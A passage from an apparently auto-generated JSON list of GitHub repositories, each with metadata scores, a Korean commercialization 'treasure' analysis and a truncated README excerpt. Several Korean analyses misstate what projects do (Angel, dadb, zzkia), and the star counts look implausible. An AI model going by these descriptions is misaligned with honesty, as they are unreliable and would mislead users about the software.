GZDoom, please see the [wiki](https://zdoom.org/wiki/) and see the \"Programmer's Corner\" on the bottom-right corner of the page to build for your platform.\n\n# Resources\n- https://zdoom.org/ - Ho","composite_score":0.1497,"license_safety_tag":"restricted"},{"name":"sparrow007/CarouselRecyclerview","github_url":"https://github.com/sparrow007/CarouselRecyclerview","stars":15,"language":"Kotlin","license":"Apache-2.0","abandonment_months":7,"description":"# CarouselRecyclerview 프로젝트 분석\n\n## 왜 보물인가\n스마트폰 앱에서 사진이나 상품을 좌우로 넘기며 보는 기능을 쉽게 만들 수 있는 도구로, 모바일 앱 개발자들이 반복적으로 구현하던 작업을 단순화합니다.\n\n## 어디에 쓸 수 있나\n- **전자상거래 앱**: 쿠팡, 당근마켓 같은 앱의 상품 이미지 슬라이드 기능 제공 서비스\n- **소셜 ","readme_excerpt":"<h1 align=\"center\">  Carousel Recyclerview </h1>\n\n<p align=\"center\">\nCreate carousel effect in recyclerview with the CarouselRecyclerview in a simple way.\n</p>\n</br>\n<p align=\"center\">\n  <a href=\"https://github.com/sparrow007/CarouselRecyclerview/actions\"><img alt=\"Build Status\"src=\"https://github.com/sparrow007/CarouselRecyclerview/workflows/Android%20CI/badge.svg\"/></a> \n  <a href=\"https://opensource.org/licenses/Apache-2.0\"><img alt=\"License\" src=\"https://img.shields.io/badge/License-Apache%202.0-blue.svg\"/></a>\n  <a href=\"http://developer.android.com/index.html\"><img alt=\"License\" src=\"https://img.shields.io/badge/platform-android-green.svg\"/></a>\n    <a href=\"https://android-arsenal.com/api?level=16\"><img alt=\"License\" src=\"https://img.shields.io/badge/API-16%2B-brightgreen.svg\"/></a>\n    <a href=\"https://mailchi.mp/kotlinweekly/kotlin-weekly-242\"><img alt=\"AndroidWeekly\" src=\"https://skydoves.github.io/badges/kotlin-weekly.svg\"/></a>\n    <a href=\"https://androidweekly.net/issues/","composite_score":0.1495,"license_safety_tag":"safe"},{"name":"Tencent/angel","github_url":"https://github.com/Tencent/angel","stars":14,"language":"Java","license":"NOASSERTION","abandonment_months":1,"description":"# Tencent/angel 보물지도\n\n## 왜 보물인가\n대규모 데이터를 빠르게 검색하고 정렬하는 기술로, 전자상거래나 금융 서비스에서 사용자가 원하는 정보를 순식간에 찾아주는 것을 가능하게 합니다.\n\n## 어디에 쓸 수 있나\n- **전자상거래 검색**: 쇼핑몰에서 수백만 개 상품 중 사용자가 원하는 물건을 1초 안에 찾아주는 검색 기능\n- **금융 데이터","readme_excerpt":"![](assets/angel_logo.png)\n\n[![license](http://img.shields.io/badge/license-Apache2.0-brightgreen.svg?style=flat)](https://github.com/Angel-ML/angel/blob/branch-3.2.0/LICENSE.TXT)\n[![Release Version](https://img.shields.io/badge/release-3.2.0-red.svg)](https://github.com/tencent/angel/releases)\n[![PRs Welcome](https://img.shields.io/badge/PRs-welcome-brightgreen.svg)](https://github.com/tencent/angel/pulls)\n[![Download Code](https://img.shields.io/badge/download-zip-green.svg)](https://github.com/Angel-ML/angel/archive/refs/heads/branch-3.2.0.zip)\n\n[(ZH-CN Version)](./README_CN.md)\n\n**Angel** is a high-performance distributed machine learning and graph computing platform based on the philosophy of Parameter Server. It is tuned for performance with big data from Tencent and has a wide range of applicability and stability, demonstrating increasing advantage in handling higher dimension model. Angel is jointly developed by Tencent and Peking University, taking account of both high availab","composite_score":0.1494,"license_safety_tag":"unknown"},{"name":"slundberg/shap","github_url":"https://github.com/slundberg/shap","stars":13,"language":"Jupyter Notebook","license":"mit","abandonment_months":0,"description":"# SHAP 저장소 분석\n\n## 왜 보물인가\nAI가 어떻게 결정을 내렸는지 인간이 이해할 수 있게 설명해주는 도구로, 은행·보험·의료 등 신뢰가 중요한 산업에서 필수적입니다.\n\n## 어디에 쓸 수 있나\n\n**1. 금융기관 SaaS 서비스**\n대출 거절 이유를 고객에게 설명할 수 있는 웹 서비스로 월 구독 형태로 판매\n\n**2. 기업 내부 의사결정 도구**\n","readme_excerpt":"\n\n<p align=\"center\">\n  <img src=\"https://raw.githubusercontent.com/shap/shap/master/docs/artwork/shap_header.svg\" width=\"800\" />\n</p>\n\n---\n[![PyPI](https://img.shields.io/pypi/v/shap)](https://pypi.org/project/shap/)\n[![Conda](https://img.shields.io/conda/vn/conda-forge/shap)](https://anaconda.org/conda-forge/shap)\n![License](https://img.shields.io/github/license/shap/shap)\n![Tests](https://github.com/shap/shap/actions/workflows/run_tests.yml/badge.svg)\n[![Binder](https://mybinder.org/badge_logo.svg)](https://mybinder.org/v2/gh/shap/shap/master)\n[![Documentation Status](https://readthedocs.org/projects/shap/badge/?version=latest)](https://shap.readthedocs.io/en/latest/?badge=latest)\n![Downloads](https://img.shields.io/pypi/dm/shap)\n[![PyPI pyversions](https://img.shields.io/pypi/pyversions/shap)](https://pypi.org/pypi/shap/)\n\n\n**SHAP (SHapley Additive exPlanations)** is a game theoretic approach to explain the output of any machine learning model. It connects optimal credit allocation ","composite_score":0.1493,"license_safety_tag":"safe"},{"name":"Angel-ML/angel","github_url":"https://github.com/Angel-ML/angel","stars":5,"language":"Java","license":"NOASSERTION","abandonment_months":1,"description":"# Angel-ML/angel 분석 리포트\n\n## 왜 보물인가\n기계학습 모델을 빠르게 학습하고 배포할 수 있는 플랫폼으로, 데이터 분석 업체들이 복잡한 기술 없이 AI 기능을 제품에 통합할 수 있게 해줍니다.\n\n## 어디에 쓸 수 있나\n**1. SaaS 서비스**: 데이터 분석 회사가 기계학습 기능을 자체 웹 서비스에 내장하여 고객에게 자동 분류, 예측 기","readme_excerpt":"![](assets/angel_logo.png)\n\n[![license](http://img.shields.io/badge/license-Apache2.0-brightgreen.svg?style=flat)](https://github.com/Angel-ML/angel/blob/branch-3.2.0/LICENSE.TXT)\n[![Release Version](https://img.shields.io/badge/release-3.2.0-red.svg)](https://github.com/tencent/angel/releases)\n[![PRs Welcome](https://img.shields.io/badge/PRs-welcome-brightgreen.svg)](https://github.com/tencent/angel/pulls)\n[![Download Code](https://img.shields.io/badge/download-zip-green.svg)](https://github.com/Angel-ML/angel/archive/refs/heads/branch-3.2.0.zip)\n\n[(ZH-CN Version)](./README_CN.md)\n\n**Angel** is a high-performance distributed machine learning and graph computing platform based on the philosophy of Parameter Server. It is tuned for performance with big data from Tencent and has a wide range of applicability and stability, demonstrating increasing advantage in handling higher dimension model. Angel is jointly developed by Tencent and Peking University, taking account of both high availab","composite_score":0.1492,"license_safety_tag":"unknown"},{"name":"Ivony/Ivony.Http.Pipeline","github_url":"https://github.com/Ivony/Ivony.Http.Pipeline","stars":6,"language":"C#","license":"unknown","abandonment_months":12,"description":"# Ivony.Http.Pipeline 분석 보고서\n\n## 왜 보물인가\n웹 서비스 간 데이터를 안전하고 체계적으로 주고받기 위한 핵심 기술로, 많은 인터넷 서비스의 기반을 이루는 기초 인프라입니다.\n\n## 어디에 쓸 수 있나\n\n**1. API 게이트웨이 SaaS**\n여러 개의 웹 서비스를 안전하게 연결해주는 중간 중개 플랫폼으로 판매 가능합니다.\n\n**2.","readme_excerpt":"The **Http Pipeline** is a HTTP request handler similar to a pipeline. \n\nIt makes it easy for us to develop a variety of HTTP Network Service components based on aspnet core. For example, API gateways, proxies, reverse proxies, response caching, load balancing, and more.\n\nWe can see many network services and components as a combination of a series of more basic components. for example:\n\na LoadBalanacer can be seen as a combination of  Forwarder, Balancer and Emitter.\n\n> **Forwarder** -> **Balancer** -> **Emitter**\n\n**Forwarder** receives and sends requests to the server and forwards them to downstream pipelines.\n\n**Balancer** distribute request to different downstream pipelines in accordance with the rules.\n\n**Emitter** sends a request to the server and returns the response\n\nWe just need to write code like this.\n\n```CSharp\n    // This method gets called by the runtime. Use this method to configure the HTTP request pipeline.\n    public void Configure( IApplicationBuilder app, IHostingEn","composite_score":0.1491,"license_safety_tag":"unknown"},{"name":"jdb78/pytorch-forecasting","github_url":"https://github.com/jdb78/pytorch-forecasting","stars":5,"language":"Python","license":"MIT","abandonment_months":0,"description":"# pytorch-forecasting 사업화 분석\n\n## 왜 보물인가\n미래의 판매량, 주가, 날씨 등을 자동으로 예측하는 인공지능 도구로, 기업의 의사결정을 데이터 기반으로 바꿀 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **재고 관리 SaaS**: 소매점이나 식품회사가 미리 물품 수요를 예측해 낭비를 줄이는 자동 시스템\n2. **금융 API 판매*","readme_excerpt":"![PyTorch Forecasting](./docs/source/_static/logo.svg)\n\n_PyTorch Forecasting_ is a PyTorch-based package for forecasting with state-of-the-art deep learning architectures. It provides a high-level API and uses [PyTorch Lightning](https://pytorch-lightning.readthedocs.io/) to scale training on GPU or CPU, with automatic logging.\n\n\n|  | **[Documentation](https://pytorch-forecasting.readthedocs.io)** · **[Tutorials](https://pytorch-forecasting.readthedocs.io/en/latest/tutorials.html)** · **[Release Notes](https://pytorch-forecasting.readthedocs.io/en/latest/CHANGELOG.html)** |\n|---|---|\n| **Open&#160;Source** | [![MIT](https://img.shields.io/github/license/sktime/pytorch-forecasting)](https://github.com/sktime/pytorch-forecasting/blob/master/LICENSE) [![GC.OS Sponsored](https://img.shields.io/badge/GC.OS-Sponsored%20Project-orange.svg?style=flat&colorA=0eac92&colorB=2077b4)](https://gc-os-ai.github.io/) | |\n| **Community** | [![!discord](https://img.shields.io/static/v1?logo=discord&label","composite_score":0.1489,"license_safety_tag":"safe"},{"name":"klaussinani/taskbook","github_url":"https://github.com/klaussinani/taskbook","stars":10,"language":"JavaScript","license":"MIT","abandonment_months":7,"description":"# Taskbook 분석 보고서\n\n## 왜 보물인가\n복잡한 설치 없이 컴퓨터 터미널에서 바로 할 일을 관리할 수 있는 간단한 도구로, 많은 개발자들이 선호하는 미니멀한 업무 관리 솔루션입니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 웹서비스**\n- 웹 버전으로 확장하여 브라우저에서 접속 가능한 팀 협업 할 일 관리 플랫폼으로 운영\n\n**2. 내부 업","readme_excerpt":"<h1 align=\"center\">\n  Taskbook\n</h1>\n\n<h4 align=\"center\">\n  Tasks, boards & notes for the command-line habitat\n</h4>\n\n<div align=\"center\">\n  <img alt=\"Boards\" width=\"70%\" src=\"media/header-boards.png\"/>\n</div>\n\n<div align=\"center\">\n  <br>\n  <sup><b>Sponsored by:</b></sup>\n  <br>\n  <a href=\"https://betterstack.com\">\n    <div>\n      <img src=\"https://github.com/Seldaek/monolog/assets/183678/7de58ce0-2fa2-45c0-b3e8-e60cebb3c4cf\" width=\"200\" alt=\"Better Stack\">\n    </div>\n    <sup>\n      Spot, Resolve, and Prevent Downtime.\n    </sup>\n  </a>\n</div>\n\n## Description\n\nBy utilizing a simple and minimal usage syntax, that requires a flat learning curve, taskbook enables you to effectively manage your tasks and notes across multiple boards from within your terminal. All data are written atomically to the storage in order to prevent corruptions, and are never shared with anyone or anything. Deleted items are automatically archived and can be inspected or restored at any moment.\n\nRead this documen","composite_score":0.1489,"license_safety_tag":"safe"},{"name":"lnx-search/lnx","github_url":"https://github.com/lnx-search/lnx","stars":5,"language":"Rust","license":"MIT","abandonment_months":7,"description":"# lnx-search/lnx 저장소 분석\n\n## 왜 보물인가\n웹사이트나 앱 내에서 사용자가 원하는 정보를 빠르게 찾을 수 있게 해주는 검색 엔진으로, 작지만 강력한 기술입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 전자문서 관리 플랫폼이나 나모 위키같은 콘텐츠 검색 서비스의 핵심 기능으로 제공\n2. **내부 업무 도구**: 대기업의 사","readme_excerpt":"# WARNING! This is the active dev branch, checkout the latest stable release: https://github.com/lnx-search/lnx/tree/refs/tags/0.9.0\n\n<p align=\"center\">\n  <img width=\"30%\" src=\"https://user-images.githubusercontent.com/57491488/156235904-5c0f956f-1bd7-4b7e-8cd0-fd344db7e632.png\" alt=\"lnx Logo\">\n</p>\n\n\n#\n<p align=\"center\">\n  <a href=\"https://github.com/lnx-search/lnx/stargazers\"><img src=\"https://img.shields.io/github/stars/lnx-search/lnx\"/></a>\n  <a href=\"hhttps://github.com/lnx-search/lnx/issues\"><img src=\"https://img.shields.io/github/issues/lnx-search/lnx\"/></a>\n  <a href=\"https://github.com/lnx-search/lnx/blob/master/LICENSE\"><img src=\"https://img.shields.io/github/license/lnx-search/lnx\"/></a>\n  <a href=\"https://docs.lnx.rs\"><img src=\"https://img.shields.io/badge/Docs-alive-sucess\"/></a>\n</p>\n<p align=\"center\"><a href=\"https://lnx.rs\">✨ Feature Rich | ⚡ Insanely Fast</a></p>\n<p align=\"center\">An ultra-fast, adaptable deployment of the tantivy search engine via REST.</p>\n\n### 🌟 Sta","composite_score":0.1488,"license_safety_tag":"safe"},{"name":"mobile-dev-inc/dadb","github_url":"https://github.com/mobile-dev-inc/dadb","stars":7,"language":"Kotlin","license":"Apache-2.0","abandonment_months":7,"description":"# mobile-dev-inc/dadb 상용화 분석\n\n## 왜 보물인가\n안드로이드 앱 개발자들이 복잡한 데이터 관리 작업을 간단하게 처리할 수 있도록 돕는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **SaaS 서비스**: 모바일 앱 개발사를 위한 클라우드 기반 데이터 관리 플랫폼으로 월 구독료 수익화\n2. **내부 업무 도구**: 안드로이드 앱 개발팀의","readme_excerpt":"# dadb\n\n[![Maven Central](https://img.shields.io/maven-central/v/dev.mobile/dadb.svg)](https://mvnrepository.com/artifact/dev.mobile/dadb)\n\n[Blog Post: Our First Open-Source Project](https://blog.mobile.dev/our-first-open-source-project-54cd8edc452f)\n\n<img src=\"https://user-images.githubusercontent.com/847683/143626125-5872bdd8-180e-48bb-a64f-47b3688a086d.png\" width=\"700px\" />\n\nA Kotlin/Java library to connect directly to an Android device without an adb binary or an ADB server\n\n```kotlin\ndependencies {\n  implementation(\"dev.mobile:dadb:<version>\")\n}\n```\n\n### Example Usage\n\nConnect to `emulator-5554` and install `apkFile`:\n\n```kotlin\nDadb.create(\"localhost\", 5555).use { dadb ->\n    dadb.install(apkFile)\n}\n```\n\n*Note: Connect to the odd adb daemon port (5555), not the even emulator console port (5554)*\n\n### Discover a Device\n\nThe following discovers and returns a connected device or emulator. If there are multiple it returns the first one found.\n\n```kotlin\nval dadb = Dadb.discover()\nif ","composite_score":0.1486,"license_safety_tag":"safe"},{"name":"alibaba/weex","github_url":"https://github.com/alibaba/weex","stars":11,"language":"C++","license":"apache-2.0","abandonment_months":5,"description":"# Alibaba Weex 저장소 분석\n\n## 왜 보물인가\n알리바바가 만든 모바일 앱 개발 플랫폼으로, 한 번의 코드 작성으로 여러 기기(스마트폰, 태블릿 등)에서 동시에 작동하는 앱을 만들 수 있습니다.\n\n## 어디에 쓸 수 있나\n1. **전자상거래 플랫폼**: 쇼핑몰 앱을 iOS·안드로이드 동시에 빠르게 출시하는 SaaS 서비스\n2. **기업 내부 업무","readme_excerpt":"# Weex\n\nA framework for building Mobile cross-platform UI.\n\n[![Build Status](https://travis-ci.org/apache/incubator-weex.svg?branch=master)](https://travis-ci.org/apache/incubator-weex/)\n\n## Distribution\n\n> Support Android 4.1 (API 16), iOS 9.0+ and WebKit 534.30+.\n\n| platform | status |\n| -------- | ------ |\n| Android | [![Maven Central](https://maven-badges.herokuapp.com/maven-central/io.weex/weex_sdk/badge.svg)](https://maven-badges.herokuapp.com/maven-central/io.weex/weex_sdk) |\n| iOS | [![Pod version](https://badge.fury.io/co/WeexSDK.svg)](https://cocoapods.org/pods/WeexSDK) [![Carthage compatible](https://img.shields.io/badge/Carthage-compatible-4BC51D.svg?style=flat)](https://github.com/Carthage/Carthage) |\n| [Web](https://github.com/weexteam/weex-vue-render) | [![npm](https://badge.fury.io/js/weex-vue-render.svg)](https://www.npmjs.com/package/weex-vue-render) |\n\n## Build from Source\n\n[How To Build](./HOW-TO-BUILD.md)\n\n## Contribution\n\nPlease read [Contributing Guide](./CONTRIB","composite_score":0.1486,"license_safety_tag":"safe"},{"name":"nuvious/pam-duress","github_url":"https://github.com/nuvious/pam-duress","stars":14,"language":"C","license":"LGPL-3.0","abandonment_months":7,"description":"# nuvious/pam-duress 분석 보고서\n\n## 왜 보물인가\n강압 상황에서 컴퓨터 접근을 막을 수 있는 '숨겨진 비상 버튼' 기술로, 보안이 중요한 조직의 직원들을 물리적 협박으로부터 보호합니다.\n\n## 어디에 쓸 수 있나\n\n**1. 금융기관 보안 솔루션**\n은행/증권사에서 직원이 협박을 받아 계좌 접근을 강요당할 때, 이 시스템으로 정상처럼 보이","readme_excerpt":"# Intro\n\nThe PAM Duress is a module designed to allow users to generate 'duress' passwords that when used in place of their\nnormal password will execute arbitrary scripts.\n\nThis functionality could be used to allow someone pressed to give a password under coercion to provide a password that\ngrants access but in the background runs scripts to clean up sensitive data, close connections to other networks to\nlimit lateral movement, and/or to send off a notification or alert (potentially one with detailed information like\nlocation, visible wifi hot-spots, a picture from the camera, a link to a stream from the microphone, etc). You could\neven spawn a process to remove the pam_duress module so the threat actor won't be able to see if the duress module was\navailable.\n\nThis is transparent to the person coercing the password from the user as the duress password will grant authentication\nand drop to the user's shell.\n\nDuress scripts can be generated on an individual user basis or generated global","composite_score":0.1486,"license_safety_tag":"restricted"},{"name":"dominikwilkowski/cfonts","github_url":"https://github.com/dominikwilkowski/cfonts","stars":35,"language":"Rust","license":"gpl-3.0","abandonment_months":7,"description":"# cfonts 상품화 분석\n\n## 왜 보물인가\n터미널(검은 화면)에 화려한 색깔의 큰 글씨로 텍스트를 표시해주는 도구로, 개발자들의 명령어 창을 더 보기 좋게 만들어줍니다.\n\n## 어디에 쓸 수 있나\n\n1. **CLI 도구 판매**: 개발자용 프로그램에 cfonts를 내장하여 사용자가 더 멋진 화면을 보도록 하는 유료 서비스\n2. **개발사 내부 도구**","readme_excerpt":"```sh\n     ██████╗ ███████╗  ██████╗  ███╗   ██╗ ████████╗ ███████╗\n    ██╔════╝ ██╔════╝ ██╔═══██╗ ████╗  ██║ ╚══██╔══╝ ██╔════╝\n    ██║      █████╗   ██║   ██║ ██╔██╗ ██║    ██║    ███████╗\n    ██║      ██╔══╝   ██║   ██║ ██║╚██╗██║    ██║    ╚════██║\n    ╚██████╗ ██║      ╚██████╔╝ ██║ ╚████║    ██║    ███████║\n     ╚═════╝ ╚═╝       ╚═════╝  ╚═╝  ╚═══╝    ╚═╝    ╚══════╝\n```\n\n![cfont styles](https://raw.githubusercontent.com/dominikwilkowski/cfonts/released/img/example1.png)\n\n<p align=\"center\"><img src=\"https://raw.githubusercontent.com/dominikwilkowski/cfonts/released/img/example2.png\" alt=\"api example\"></p>\n<p align=\"center\">\n\t<a href=\"https://crates.io/crates/cfonts\"><img src=\"https://img.shields.io/crates/v/cfonts.svg\" alt=\"crates badge\"></a>\n\t<a href=\"https://crates.io/crates/cfonts\"><img src=\"https://docs.rs/cfonts/badge.svg\" alt=\"crates docs tests\"></a>\n\t<a href=\"https://github.com/dominikwilkowski/cfonts/actions/workflows/testing.yml\"><img src=\"https://github.com/dominikwil","composite_score":0.1485,"license_safety_tag":"restricted"},{"name":"facebook/SocketRocket","github_url":"https://github.com/facebook/SocketRocket","stars":6,"language":"Objective-C","license":"NOASSERTION","abandonment_months":6,"description":"# facebook/SocketRocket 보물 분석\n\n## 왜 보물인가\n페이스북이 만든 실시간 통신 라이브러리로, 채팅이나 알림 같은 빠른 데이터 전송이 필요한 앱을 만드는 데 필수적인 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **실시간 채팅 SaaS**: 팀 협업 도구나 고객 지원 챗봇 플랫폼에서 메시지를 즉시 전달\n2. **주식/암호화폐 거래 AP","readme_excerpt":"# SocketRocket\n\n![Platforms][platforms-svg]\n[![License][license-svg]][license-link]\n\n[![Podspec][podspec-svg]][podspec-link]\n[![Carthage Compatible][carthage-svg]](carthage-link)\n\n[![Build Status][build-status-svg]][build-status-link]\n\nA conforming WebSocket ([RFC 6455](https://tools.ietf.org/html/rfc6455>)) client library for iOS, macOS, tvOS and visionOS.\n\nTest results for SocketRocket [here](http://facebook.github.io/SocketRocket/results/).\nYou can compare to what modern browsers look like [here](http://autobahn.ws/testsuite/reports/clients/index.html).\n\nSocketRocket currently conforms to all core ~300 of [Autobahn](http://autobahn.ws/testsuite/>)'s fuzzing tests \n(aside from two UTF-8 ones where it is merely *non-strict* tests 6.4.2 and 6.4.4).\n\n## Features/Design\n\n- TLS (wss) support, including self-signed certificates.\n- Seems to perform quite well.\n- Supports HTTP Proxies.\n- Supports IPv4/IPv6.\n- Supports SSL certificate pinning.\n- Sends `ping` and can process `pong` events.\n- A","composite_score":0.1484,"license_safety_tag":"unknown"},{"name":"StackExchange/Dapper","github_url":"https://github.com/StackExchange/Dapper","stars":10,"language":"C#","license":"NOASSERTION","abandonment_months":0,"description":"# Dapper 저장소 분석\n\n## 왜 보물인가\n데이터베이스와 프로그램을 연결해주는 가벼운 도구로, 복잡한 작업을 간단하게 만들어 개발자들이 선호합니다.\n\n## 어디에 쓸 수 있나\n- **SaaS 서비스**: 고객 정보, 주문 데이터 등을 빠르게 저장하고 불러오는 웹 서비스 개발\n- **내부 업무 도구**: 회사의 직원 관리, 재고 추적, 판매 기록 시스템","readme_excerpt":"Dapper - a simple object mapper for .Net\n========================================\n[![Build status](https://ci.appveyor.com/api/projects/status/8rbgoxqio76ynj4h?svg=true)](https://ci.appveyor.com/project/StackExchange/dapper)\n\nRelease Notes\n-------------\nLocated at [https://github.com/DapperLib/Dapper/releases](https://github.com/DapperLib/Dapper/releases/)\n\nPackages\n--------\n\nMyGet Pre-release feed: https://www.myget.org/gallery/dapper\n\n| Package | NuGet Stable | NuGet Pre-release | Downloads | MyGet |\n| ------- | ------------ | ----------------- | --------- | ----- |\n| [Dapper](https://www.nuget.org/packages/Dapper/) | [![Dapper](https://img.shields.io/nuget/v/Dapper.svg)](https://www.nuget.org/packages/Dapper/) | [![Dapper](https://img.shields.io/nuget/vpre/Dapper.svg)](https://www.nuget.org/packages/Dapper/) | [![Dapper](https://img.shields.io/nuget/dt/Dapper.svg)](https://www.nuget.org/packages/Dapper/) | [![Dapper MyGet](https://img.shields.io/myget/dapper/vpre/Dapper.svg)](https:","composite_score":0.1481,"license_safety_tag":"unknown"},{"name":"eimg/Books-by-Ei-Maung","github_url":"https://github.com/eimg/Books-by-Ei-Maung","stars":5,"language":"","license":"unknown","abandonment_months":7,"description":"# Books-by-Ei-Maung 저장소 분석\n\n## 왜 보물인가\n미얀마 작가의 도서 목록을 체계적으로 정리한 디지털 아카이브로, 접근이 어려운 아시아 문학 자료를 누구나 찾을 수 있게 만든 점이 가치입니다.\n\n## 어디에 쓸 수 있나\n1. **아시아 문학 검색 플랫폼**: 미얀마·동남아 저자 작품을 검색하고 추천하는 웹사이트로 운영\n2. **출판사 내부","readme_excerpt":"# Books by Ei Maung\n\nSource <a href=\"https://eimaung.com/\">eimaung.com</a>\n\n","composite_score":0.1481,"license_safety_tag":"unknown"},{"name":"dcalsky/zzkia","github_url":"https://github.com/dcalsky/zzkia","stars":7,"language":"JavaScript","license":"unknown","abandonment_months":12,"description":"# dcalsky/zzkia 보물 분석\n\n## 왜 보물인가\n프로젝트 정보가 매우 부족하여 구체적인 가치를 판단하기 어렵지만, 지속적인 업데이트(2025년 6월)를 보면 실제 사용 중인 활성 프로젝트로 보입니다.\n\n## 어디에 쓸 수 있나\n1. **내부 업무 도구**: 회사의 특정 업무 자동화나 데이터 처리 도구로 팀 내부에서 사용\n2. **API 판매**:","readme_excerpt":"# ZZKIA\n\nGenerate the old Nokia message screenshot.\n\n## Development\n\nWEB CONTAINER IS RUNNING ON THE **5003** PORT.\n\nDev Mode(Server and web client will be hot-reload):\n\n```\n$ docker-compose up\n```\n\nProd Mode:\n\n```\n$ docker-compose -f docker-compose.prod.yaml up -d\n```\n\nDemo picture: ![](./public/demo.png)\n\n[![Powered by DartNode](https://dartnode.com/branding/DN-Open-Source-sm.png)](https://dartnode.com \"Powered by DartNode - Free VPS for Open Source\")\n","composite_score":0.1478,"license_safety_tag":"unknown"},{"name":"thomasp85/patchwork","github_url":"https://github.com/thomasp85/patchwork","stars":9,"language":"R","license":"NOASSERTION","abandonment_months":9,"description":"","readme_excerpt":"\n<!-- README.md is generated from README.Rmd. Please edit that file -->\n\n# patchwork <a href='https://patchwork.data-imaginist.com'><img src='man/figures/logo.png' align=\"right\" height=\"131.5\" /></a>\n\n<!-- badges: start -->\n\n[![R-CMD-check](https://github.com/thomasp85/patchwork/actions/workflows/R-CMD-check.yaml/badge.svg)](https://github.com/thomasp85/patchwork/actions/workflows/R-CMD-check.yaml)\n[![CRAN_Release_Badge](http://www.r-pkg.org/badges/version-ago/patchwork)](https://CRAN.R-project.org/package=patchwork)\n[![CRAN_Download_Badge](http://cranlogs.r-pkg.org/badges/patchwork)](https://CRAN.R-project.org/package=patchwork)\n[![Codecov test\ncoverage](https://codecov.io/gh/thomasp85/patchwork/branch/main/graph/badge.svg)](https://app.codecov.io/gh/thomasp85/patchwork?branch=main)\n<!-- badges: end -->\n\nThe goal of `patchwork` is to make it ridiculously simple to combine\nseparate ggplots into the same graphic. As such it tries to solve the\nsame problem as `gridExtra::grid.arrange()` ","composite_score":0.1475,"license_safety_tag":"unknown"},{"name":"sebastianbergmann/code-unit-reverse-lookup","github_url":"https://github.com/sebastianbergmann/code-unit-reverse-lookup","stars":9,"language":"PHP","license":"bsd-3-clause","abandonment_months":12,"description":"# sebastianbergmann/code-unit-reverse-lookup 분석\n\n## 왜 보물인가\n소프트웨어 개발자들이 코드의 특정 부분을 빠르게 찾아내는 작업을 자동화할 수 있는 도구입니다.\n\n## 어디에 쓸 수 있나\n1. **개발팀 협업 플랫폼**: 코드 검토 시 문제 부분을 정확히 지정하는 기능 탑재\n2. **자동 버그 리포팅 서비스**: 오류","readme_excerpt":"[![No Maintenance Intended](https://unmaintained.tech/badge.svg)](https://unmaintained.tech/)\n[![Latest Stable Version](https://poser.pugx.org/sebastian/code-unit-reverse-lookup/v)](https://packagist.org/packages/sebastian/code-unit-reverse-lookup)\n[![CI Status](https://github.com/sebastianbergmann/code-unit-reverse-lookup/workflows/CI/badge.svg)](https://github.com/sebastianbergmann/code-unit-reverse-lookup/actions)\n[![codecov](https://codecov.io/gh/sebastianbergmann/code-unit-reverse-lookup/branch/main/graph/badge.svg)](https://codecov.io/gh/sebastianbergmann/code-unit-reverse-lookup)\n\n# sebastian/code-unit-reverse-lookup\n\nLooks up which function or method a line of code belongs to.\n\n## Installation\n\nYou can add this library as a local, per-project dependency to your project using [Composer](https://getcomposer.org/):\n\n```\ncomposer require sebastian/code-unit-reverse-lookup\n```\n\nIf you only need this library during development, for instance to run your project's test suite, then you ","composite_score":0.1475,"license_safety_tag":"safe"},{"name":"openvinotoolkit/cvat","github_url":"https://github.com/openvinotoolkit/cvat","stars":7,"language":"Python","license":"MIT","abandonment_months":0,"description":"# CVAT 저장소 분석\n\n## 왜 보물인가\n사진이나 영상에서 물체를 표시하고 분류하는 작업을 누구나 쉽게 할 수 있는 무료 도구로, AI 학습에 필요한 데이터를 빠르게 준비할 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n**1. SaaS 서비스**: 자동차 보험사가 사고 영상 분석을 위해 클라우드 기반 CVAT을 임차하여 손상 부위 자동 감지 서비스 제공\n","readme_excerpt":"[![CVAT Community header](site/content/en/images/cvat_github_header.webp)](https://app.cvat.ai)\n# CVAT: Computer Vision Annotation Tool\n\n[![Release][release-img]][release-url]\n[![GitHub stars][stars-img]][stars-url]\n[![License][license-img]][license-url]\n[![CI][ci-img]][ci-url]\n[![server pulls][docker-server-pulls-img]][docker-server-image-url]\n[![ui pulls][docker-ui-pulls-img]][docker-ui-image-url]\n[![CVAT Online][online-img]][online-url]\n[![CVAT Enterprise][enterprise-img]][enterprise-url]\n[![Status][status-img]][status-url]\n[![Discord][discord-img]][discord-url]\n[![Docs][docs-img]][docs-url]\n\n[Website](https://www.cvat.ai/) ·\n[Docs](https://docs.cvat.ai/docs/) ·\n[Changelog](https://www.cvat.ai/resources/changelog) ·\n[Tutorials](https://www.cvat.ai/resources/videos) ·\n[Academy](https://www.cvat.ai/resources/academy) ·\n[Blog](https://www.cvat.ai/resources/blog)\n\n## What is CVAT Community?\n\n**CVAT Community** is the free, self-hosted open-source edition of [CVAT](https://www.cvat.ai/) ","composite_score":0.1473,"license_safety_tag":"safe"},{"name":"DapperLib/Dapper","github_url":"https://github.com/DapperLib/Dapper","stars":5,"language":"C#","license":"NOASSERTION","abandonment_months":0,"description":"# DapperLib/Dapper 비즈니스 분석\n\n## 왜 보물인가\n데이터베이스 작업을 간단하게 만들어주는 도구로, 기업들이 개발 비용과 시간을 크게 줄일 수 있습니다.\n\n## 어디에 쓸 수 있나\n\n1. **SaaS 서비스**: 고객 정보 관리 시스템이나 클라우드 회계 소프트웨어처럼 데이터를 다루는 온라인 서비스에 내장하여 판매\n2. **내부 업무 도구**","readme_excerpt":"Dapper - a simple object mapper for .Net\n========================================\n[![Build status](https://ci.appveyor.com/api/projects/status/8rbgoxqio76ynj4h?svg=true)](https://ci.appveyor.com/project/StackExchange/dapper)\n\nRelease Notes\n-------------\nLocated at [https://github.com/DapperLib/Dapper/releases](https://github.com/DapperLib/Dapper/releases/)\n\nPackages\n--------\n\nMyGet Pre-release feed: https://www.myget.org/gallery/dapper\n\n| Package | NuGet Stable | NuGet Pre-release | Downloads | MyGet |\n| ------- | ------------ | ----------------- | --------- | ----- |\n| [Dapper](https://www.nuget.org/packages/Dapper/) | [![Dapper](https://img.shields.io/nuget/v/Dapper.svg)](https://www.nuget.org/packages/Dapper/) | [![Dapper](https://img.shields.io/nuget/vpre/Dapper.svg)](https://www.nuget.org/packages/Dapper/) | [![Dapper](https://img.shields.io/nuget/dt/Dapper.svg)](https://www.nuget.org/packages/Dapper/) | [![Dapper 